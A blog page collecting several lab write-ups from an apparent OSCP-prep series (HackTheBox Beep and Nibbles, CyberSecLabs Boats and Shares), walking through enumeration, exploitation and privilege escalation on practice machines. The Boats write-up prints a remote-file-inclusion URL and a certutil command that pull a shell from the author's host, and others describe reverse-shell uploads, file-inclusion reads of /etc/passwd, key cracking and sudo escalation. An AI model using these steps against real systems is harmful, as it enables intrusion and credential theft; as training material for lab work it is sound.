Close
Writeup – HTB – Beep

Writeup – HTB – Beep

This box got me going for a little bit, until I remembered my basics and focused. Beep is a good box for demonstrating the most common vulnerability of all – users. With that said, let’s get to it! The initial AutoRecon scan shows a lot of open ports.

This is a box that requires patience!

As you can see, we have a lot to work with here. SSH, SMTP, HTTP (on Port 80, 443, and 10000), a POP3 Server, an IMAP Server, and numerous others (HylaFax anyone?).

With there not being a lot of common ports here, probably the best place to start is by looking at the HTTP ports. Port 80 has nothing, and quickly redirects over to Port 443. Port 10000 has a Webmin portal up, which may be accessible.

The best thing here is to slow down, get all of your services down, and RESEARCH! Look up vulnerabilties on each port related to the services, and if possible, the versions of the software (if you can find them). This is the only good way to stop you from going down rabbit holes.

Eventually, on the HTTPS server on port 443, you’ll see the Elastix login. Looking up vulnerabilities for this takes you to https://www.exploit-db.com/exploits/37637, which describes the ability to perform some local file inclusion. If you read through the comments, you can find the Proof of Concept here:

Trying this out by pasting it in our browser window works! You’ll be able to pull up a configuration file for the Asterisk Management Portal. Right-clicking and selecting View-Source will probably make it look a little better for you, like this:

Scrolling through here we can see a bunch of passwords, including some that are re-used. That is the key to this lesson – password re-use. Maybe one of these is re-used for other logins. We have some passwords, let’s use the LFI vulnerability to get our users list.

Modifying the LFI to browse to the /etc/passwd file works, and we can see the standard root user has logon, as well as the user on the bottom, fanis.

Trying both of these user names against our passwords from our configuration file over SSH quickly gains us access. I’ve included a screenshot of an error I’ve received trying to SSH in here as well as the fix, for future reference. This is because of the age of this box, but it still could be applicable in future pentesting.

Once here, it’s a trivial matter again to browse to the two flags. No extra privilege escalation needed!

OSCP Preps – Introduction

OSCP Preps – Introduction

For my OSCP Preparations using HackTheBox, I’ll be following an awesome list made by TJ Null and the Mayor, Joe Helle. The list is curated here for your enjoyment. I did make a few changes – I sorted it out into Linux and Windows, and sorted from easiest to most difficult.

The purpose of doing this is to build up muscle memory in methodology, as well as get some great notes for taking the OSCP with.

Linux Boxes:

  • Lame
  • Beep
  • Blocky
  • Mirai
  • Shocker
  • Sense
  • Bashed
  • Nibbles
  • Valentine
  • Sunday
  • Frolic
  • Irked
  • Friendzone
  • Swagshop
  • Networked
  • Postman
  • Traverxec
  • OpenAdmin
  • Popcorn
  • Cronos
  • Haircut
  • Nineveh
  • SolidState
  • Node
  • Poison
  • TartarSauce
  • Jarvis
  • Brainfuck

Windows Boxes:

  • Legacy
  • Devel
  • Optimum
  • Arctic
  • Grandpa
  • Granny
  • Blue
  • Bounty
  • Jerry
  • Active
  • Bastion
  • Forest
  • Servmon
  • Buff (ACTIVE)
  • Bastard
  • Chatterbox
  • Silo
  • Secnotes
  • Conceal
  • BankRobber

For each box, I will write a walkthrough, and I will make a Youtube video of it as well. If it is during my stream time, I will livestream the work on it.

Thanks for coming along on the journey! I’m looking forward to this and crushing the OSCP before Christmas!

Writeup – CSL – Boats

Writeup – CSL – Boats

So the Boats box is a neat one, and I thoroughly enjoyed my first attempt at it live on Twitch the other day. Let’s dive right in and get after this!

Windows box on CSL!

Once we add the ip address to our /etc/hosts file, let’s get after this box with a good ol’ AutoRecon scan and check out the results. We see a bunch of ports open, including port 80, so while the scan is running, we can go check there.

Looks like a WordPress site to me!

Now, anytime I see a WordPress site, I get excited. And any time I see a potential plugin, I get even more excited. See that shopping cart label in the top right? That’s where I get excited.

So I kicked off a wpscan, and didn’t find anything, but I know there’s a plugin, so I clicked on the shopping cart and viewed the source. I see a plugin called “The Cart Press.” Let’s find vulnerabilities.

JAMES is a username!
thecartpress, I see!

Over on Exploit Database, we see a few. The Remote File Inclusion one really piques my interest. Remote file inclusion will require us to host our own file to be called out by the vulnerability. Let’s hope we are on the right version and give it a shot!

Remote File Inclusion!

Next step is to download one of my favorite remote shells and host it on a simple HTTP Server. I use the shell from https://github.com/namansahore/Remote-File-Inclusion-Shell. I highly recommend it (P.S., it’s forked on my repository as well!). Host that in the directory of your choice (I named mine shell.php) and fire up a simpleHTTPServer (I used sudo and did it on port 80).

http://172.31.1.14/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://10.10.0.11/shell.php

Boom, that was where I browsed to from Exploit-DB, and below is what you get when you pop my favorite remote file!

At this point the remote shell won’t work, but you can issue windows commands like dir to verify you have control. A great command to use in this case is certutil, and you can upload files utilizing it.

First step, make a payload using msfvenom. I utilize the cheatsheet over at https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ to make my payloads.

Second, ensure your new shell.exe file is being hosted by your SimpleHTTPServer, and upload it with certutil. Here is the command line that worked for me: certutil -f http://10.10.0.11/shell.exe shell.exe

shell.exe uploaded successfully!

At this point, use msfconsole to kick off a meterpreter listener, as shown below, and run that shell.exe command! It’s going to be slow to connect, but once it does, you will be nt authority/system and be able to go get your flags!

Here’s our listener, and below kicks off the shell.exe!
Boom! We own the box!

Thanks for catching the next writeup in my OSCP Prep series of writeups for CyberSecLabs! Stay tuned for the YouTube video to follow! And as always, keep hacking!

Writeup – CSL – Shares

Writeup – CSL – Shares

As the first box I’m doing from the great guys over at CyberSecLabs (https://www.cyberseclabs.co.uk/), let’s fire it up and get to work!

Turn this bad boy on!

After adding the alias shares.csl to my /etc/hosts file, I kicked off AutoRecon and took a close look at the results. Here we see port 21 (FTP), port 80 (HTTP), port 111 (RPC), port 2049 (NFS), and port 27853 (Running SSH!), as well as some higher level ports. This high SSH port seemed odd to me.

Looking into the easy ports here, with NFS (Network File Sharing), we take a look at the nmap scan that was run on Port 111, and we see the following mount:

The *.*.*.* means it can be mounted by any IP address.

We mount this drive and see what we’ve got:

How to mount the directory. There’s more!

Thinking back to the high-port number running SSH, I bet that .ssh directory may be interesting!

Boom, private key!

Unfortunately, when you try using the private SSH key to login, and if you paid attention above, you’ll be denied access, asking for a passphrase, as the key is …. ENCRYPTED! But have no fear, ssh2john is here!

Prep the key for cracking!

Once you have it prepped for john, run john with the rockyou.txt wordlist to find the passphrase for the original key!

Boom. Now let’s login.

Now that we have the passphrase, don’t forget to chmod 600 the original private key and let’s login. Once logged in, run sudo -l, and we see there’s a user named amy that we can run /usr/bin/pkexec or /usr/bin/python3 as.

Getting somewhere now!

It’s trivial at this point to get on as amy. Simply search GTFOBins for the python binary, and take a look at sudo privileges, https://gtfobins.github.io/gtfobins/python/. Switching users to amy and running python is a breeze.

And we’re amy!

Now, as amy, don’t forget to get the access.txt flag, and let’s sudo -l again! Now you see that we can run /usr/bin/ssh as anyone we want with no password, including root!

GTFOBins again? No way!

A quick trip back to GTFOBins shows us the way. Just look under sudo for ssh: https://gtfobins.github.io/gtfobins/ssh/

Don’t forget that system flag!

Thanks for tuning in to the first box I’ve gone after in the Beginner section of CyberSecLabs! I’m truly enjoying the quality of the content they’re providing here so far, and stay tuned for more!

Writeup – HTB – Nibbles

This is the 2nd box of TJ Null’s OSCP Preparation list, and the first one I’m publishing my writeup for. I recorded the video for YouTube earlier this evening, and I’ll get that posted as soon as my awesome new branding, courtesy of Nathan Cavitt at Mad Standards, comes in!

Once this box is launched, run your standard autorecon scan against it, and wait while it finishes. I tend to add the IP address of the box to my /etc/hosts so I can track the folders easier. As you can see by the screenshot below, port 22 (SSH) and port 80 (HTTP) are open, and the subsequent scans are kicking off.

Nibbles Autorecon
Port 22 and 80 are open!

With CTF-like one-off boxes to hack, chances of port 22 having anything are pretty slim to none here. SSH is not a very oft-hacked protocol, and bruteforcing isn’t normally the goal here. Let’s take a look at port 80’s nmap-http scan.

Look at that comment!

When autorecon kicks off the subsequent scans, it runs with the appropriate scripts for the port. Great! Here you can see there is a comment on the index of the page that refers you to the nibbleblog directory. Let’s do some enumeration with gobuster on the nibbleblog directory and see what we can find.

Seems pretty standard so far. A login page exists at admin.php, and pulling up the README, you can see that we are running nibbleblog version 4.0.3. A quick jaunt to Exploit-DB (https://www.exploit-db.com/exploits/38489) will show there is an exploit, but you need to know the username and password for it! Time to do some more looking around.

Here’s our username of “admin”!

If you try brute-forcing the password with hydra, you will quickly get an error of blacklist protection, causing you to have to reboot the VM. Luckily, taking a look at config.xml and just trying some simple ones shows that we have a lazy admin here!

The password is ‘nibbles’.

At this point you can run metasploit and you will get a shell, enabling you to grab the user flag. However, when I went that route, I had issues with privilege escalation that I did not have when I ran this exploit manually, and as I’m prepping for the OSCP, that’s the path we will take here. Let’s keep at it! Login to the website with the above credentials, and let’s keep at it!

The exploit, reading Exploit-DB and the CVE (https://nvd.nist.gov/vuln/detail/CVE-2015-6967) says it utilizes an unrestricted file upload vulnerability in the My Image plugin to upload an executable file and access it at “content/private/plugins/my_image/image.php” so that’s exactly what we will do. I grabbed a PHP reverse shell courtesy of pentestmonkey (https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php), updated it with my IP address and port, and renamed it to image.php, finally uploading it via the Plugins page. All that’s left to do is browse to the page and get the reverse shell!

And we have the user!

From here it’s trivial to browse to /home/nibbler and read user.txt. But what is our path to root from this point? The first, and easiest thing to do is check permissions by running sudo -l. As you can see, there’s something of interest here!

Permission to run something as root!

Well, you know we have to check that out! Going to the folder though all we see is a zip file. Unzipping it, we get the monitor.sh discussed. At this point, there’s a few things we can do. You could edit monitor.sh to run netcat back to another listener you set up, or you can go about it the quick way, like this:

Boom root!

As you can see, we echo’d “bash -i” and overwrote monitor.sh with the command to give us an interactive bash shell. We then ran it using sudo, which ran it with no password as ROOT. Once done, we have a root shell! From here it’s trivial to go to /root/root.txt and get the flag for your submission!

I hope you’ve enjoyed the second machine in the TJ Null OSCP Prep list! Stay tuned for more!